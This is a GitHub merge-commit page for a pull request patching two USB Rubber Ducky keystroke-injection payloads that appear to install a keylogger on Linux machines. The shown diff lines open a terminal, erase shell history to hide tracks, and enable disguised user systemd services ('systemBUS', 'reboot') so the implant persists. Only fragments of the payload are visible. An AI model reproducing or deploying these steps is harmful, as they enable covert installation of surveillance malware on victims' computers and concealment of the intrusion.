Merge pull request #411 from Kr1ss-XD/patch-DuckyLogger

Patch ducky logger
pull/456/head
Peaks 2024-06-09 15:27:26 -04:00 committed by GitHub
commit cd3704042c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 2 additions and 11 deletions

View File

@ -13,7 +13,7 @@ REM [keeping tracks clear]
DELAY 500 DELAY 500
CTRL-ALT t CTRL-ALT t
DELAY 400 DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE STRING export HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER ENTER
DELAY 100 DELAY 100
@ -75,14 +75,8 @@ DELAY 300
STRING systemctl --user enable --now systemBUS.service STRING systemctl --user enable --now systemBUS.service
ENTER ENTER
DELAY 150 DELAY 150
STRING systemctl --user start --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user enable --now reboot.service STRING systemctl --user enable --now reboot.service
ENTER ENTER
DELAY 150
STRING systemctl --user start --now reboot.service
ENTER
DELAY 100 DELAY 100
REM [autostarting service on terminal/shell launch] REM [autostarting service on terminal/shell launch]

View File

@ -13,7 +13,7 @@ REM [keeping tracks clear]
DELAY 500 DELAY 500
CTRL-ALT t CTRL-ALT t
DELAY 400 DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE STRING export HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER ENTER
DELAY 100 DELAY 100
@ -67,8 +67,5 @@ DELAY 300
STRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer STRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer
ENTER ENTER
DELAY 150 DELAY 150
STRING systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer
ENTER
DELAY 150
STRING exit STRING exit
ENTER ENTER